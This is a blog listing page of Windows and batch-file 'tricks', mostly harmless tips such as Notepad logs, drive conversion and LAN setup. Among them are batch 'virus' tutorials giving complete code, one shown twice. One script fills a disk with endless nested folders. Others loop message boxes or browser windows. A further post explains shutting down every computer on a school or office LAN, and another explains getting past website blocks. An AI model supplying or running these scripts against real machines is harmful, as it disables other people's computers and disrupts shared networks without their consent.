Posts

Showing posts with the label BATCH FILE TRICKS

Simple Trick To Use Web Browsers As Text Editor

Image
                                                  In this tutorial i will show you a simple and  interesting trick  to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like  Notepad . This trick works on all web browsers. So lets  get started . How To Do ?    1 Copy below code in browser  Url Section  data:text/html, <html contenteditable>    2. Now Press  Enter .    3. Now you can type anything as would do on any other text editor like Notepad.    4. To save your  text file  Press  Ctrl + S  and save it as anything .txt  (.txt Is Must)

Batch File programming tutorial 5 | Batch file directory maker virus

Image
Batch File programming tutorial 5 – Batch file directory maker virus I have been posting about batch file programming from quite long. Batch file programming is very useful and easy. You can use these files with any other programming languages too. Do read all of my batch programming tutorials to get a better understanding of batch files and batch file programming. Here is my next tutorial about batch programming. In this programming tutorial I will teach you how to create a folder creator virus using batch programming. Batch File Coding @echo off mkdir howtohack :loop cd howtohack mkdir howtohack echo>batchprogramming.txt echo Virus in your PC>>batchprogramming.txt goto loop Copy the command and paste in notepad and save as  anything.bat This virus will create infinite folders named howtohack and batchprogramming.txt file into the howtohack folder until the disk is exhausted. Explanation : mkdir :  this command is used to create new fo...

Batch File Programming Tutorial 4 | Some more advanced batch commands and viruses

Image
This tutorial is continuation to my Batch File Programming series. In this post we will discuss about Looping in batch files and how to use them to create horrible viruses!! I will also discuss about how to change icon and convert  .ba t file to .exe  file. Steps :- 1) Open notepad and copy paste any of the following codes. <<<<<<<<<<<<<< Code -01 >>>>>>>>>>>>>>>> @echo off :loop msg * write your text here goto loop <<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>> <<<<<<<<<<<<<< Code -02 >>>>>>>>>>>>>>>> @echo off :loop start iexplore.exe  www.anywebsite.com goto loop <<<<<<<<<<<<<< Code Ends >>>>>>>>>>>>>>> <<...

Batch File programming tutorial 5 | Batch file directory maker virus

Image
Batch File programming tutorial 5 – Batch file directory maker virus I have been posting about batch file programming from quite long. Batch file programming is very useful and easy. You can use these files with any other programming languages too. Do read all of my batch programming tutorials to get a better understanding of batch files and batch file programming. Here is my next tutorial about batch programming. In this programming tutorial I will teach you how to create a folder creator virus using batch programming. Batch File Coding @echo off mkdir howtohack :loop cd howtohack mkdir howtohack echo>batchprogramming.txt echo Virus in your PC>>batchprogramming.txt goto loop Copy the command and paste in notepad and save as  anything.bat This virus will create infinite folders named howtohack and batchprogramming.txt file into the howtohack folder until the disk is exhausted. Explanation : mkdir :  this command is used to create new folde...

Create Ghost image of Hard Disk

How to create ghost image of hard disk for free? If yes then you are the person who want to backup complete disk  along with OS. So lets see how we can create hard disk image or  ghost image or disk clone without using those highly priced ghost  creating software. Requirements: Ubuntu Live CD/DVD, A hard disk with more capacity than the one  you want to clone and some basic knowledge of Linux. Procedure: Linux provides disk dumping feature, this feature can be used for  creating complete backup of any possible storage media. And we  will use this feature of Linux command shell to create ghost  images. While writing this tutorial I am assuming that you want  to backup a hard disk which already have an OS installed in it. Boot from Ubuntu Live CD/DVD Now mount the hard disk you want to take backup on /mnt folder Now take backup using following commands, [root@localhost~]dd if=/d...

Make personal diary in Notepad

Make a Personal Diary(Log) with Notepad You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note.  To do so, open Notepad and type . LOG in capital letters and press Enter.  Save the file.  Now, every time you open this file, notepad will automatically insert the current time and date before the note.  Just enter your note and save the file each time after making an entry. All these Notepad tricks are totally harmless and would not harm your PC in any way.  To close any of the VBS trick given, open task manager and close the wscript.exe process.

Convert FAT32 to NTFS without formatting?

Convert FAT32 to NTFS Without Formatting or Losing Data Important: While this method works perfectly, I would still advise you to backup your data in case anything goes wrong. FAT 32 to NTFS Conversion Steps 1) Go to Computer, and note the name of the drive whose file system you wish to convert. 2) Click on Start. 3) Type cmd in the search bar if you use Windows 7, Windows 8 or Windows Vista. If you use Windows XP, click on Run and then execute cmd. 4) Execute "chkdsk h: /f " (without quotes) where H is the letter of the drive to undergo conversion. This checks the drive for errors and fixes them automatically. 5) Execute "Convert H: /FS:NTFS" (without quotes). H is again the letter of the drive to be converted. 6) The command prompt will start the conversion process and after a few minutes, CMD will say that conversion was successful. 7) You can check it in the properties of the drive through right click<Properties. This works on Win...

Access block website

Access Blocked Websites at School, Work or Anywhere To access a blocked website, you can enter the IP address instead of the URL in your browser's address bar. You can find the IP address of the website by pinging the website domain name in command prompt and noting its IP address.

Change text style in Chat

Edit text style in chat 1. For making the text Bold type your words between * *(two stars ) will automatically turns into bold. 2. For underlined Text type between _ _(two underscores) will automatically turns into underlined text 3. For writing Bold+Underline Whatever you type between *_ _* will automatically turns into Bold+Underline

Batch File to Lock Computer

How to create the batch file to lock a folder? 1. Copy and paste the following codes in a notepad file. cls @ECHO OFF title Folder Confidential if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Confidential goto MDLOCKER :CONFIRM echo Are you sure you want to lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Confidential "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter the Password to unlock folder set/p "pass=>" if NOT %pass%== Replace this Red portion with your password goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" C...

Check whether you are victim of RAT?

How to check whether you are victims of RATs or NOT? 1. Now every program has their own process which can be seen on task manager. So the first thing to do is to find out which process the Trojan is being attached to. If you see some unknown process search that on google. A good hacker will always Makes sure he hides its process with a Windows based Process, for eg. svchost.exe or something like  that. 2. If you cant find, then the next thing you can do is use cmd (to open cmd prompt, Click on Start—>Accessories–>Command prompt). 3. Once Command Prompt is opened, use this command: netstat -an |find /i “listening” Note: The NETSTAT command will show you whatever ports are open or in use, but it is NOT a port scanning tool! Now we wonder What this Command does? This command will show all the opening ports. Now check for any unknown port. 4. You can skip Step 3 if you want, and can do this instead. Open command prompt and type netstat -b Now this command will show...

shut computer on lan

Shutdown all computers on a LAN. Guys here is a amazing trick which you can use in your school, college office or at any place where you are a part of any LAN to shutdown all computers. Just follow some steps and you are done with this cool trick. First of all you need admin access to a computer connected on any LAN. Now open commant prompt. (start/run/cmd) Now type “shutdown –i” (without quotes). A dilogue box will open. You can add the computer/computers you want to make target. Now you have to choose the action (shutdown/restart/log out). Set a time limit. Click ok and other work will be done automatically.

Auto save passwords in IE

How to Auto Save Passwords Without Notification in IE This brief tutorial will show you how to save your passwords and username automatically, without this annoying notification! 1. Click Tools. 2. Click Internet Options. 3. Select the Content tab. 4. Under the Autocomplete section, click Settings. 5. At this point, the Auto Complete settings Dialog box will popup. Untick the Prompt me to save passwords check box. 6. Click OK to save.

Connect via LAN

Image
How to Connect Two Windows Computers On LAN Using an Ethernet Crossover Cable Following are the steps involved to configure both computers and connect them using a crossover Ethernet cable : 1. Turn off both computers and connect one end of the ethernet cable to the network card slot of computer1. Then connect the other end of the ethernet cable to the network card slot of computer2. The network card slot is located at the back side of computer CPU and looks somewhat similar to the following screenshot: 2. After both the ends of the ethernet cable is connected, turn on both the computers one by one. It doesn’t matter which one you start with. 3. Now you have to assign a unique Workgroup to each computer. The following step is applicable for Windows XP, Windows Vista and Windows 7. If your operating system is Windows XP : From the Start menu, right click on “My Computer” and select “Properties”. Click the “Change” button and assign t...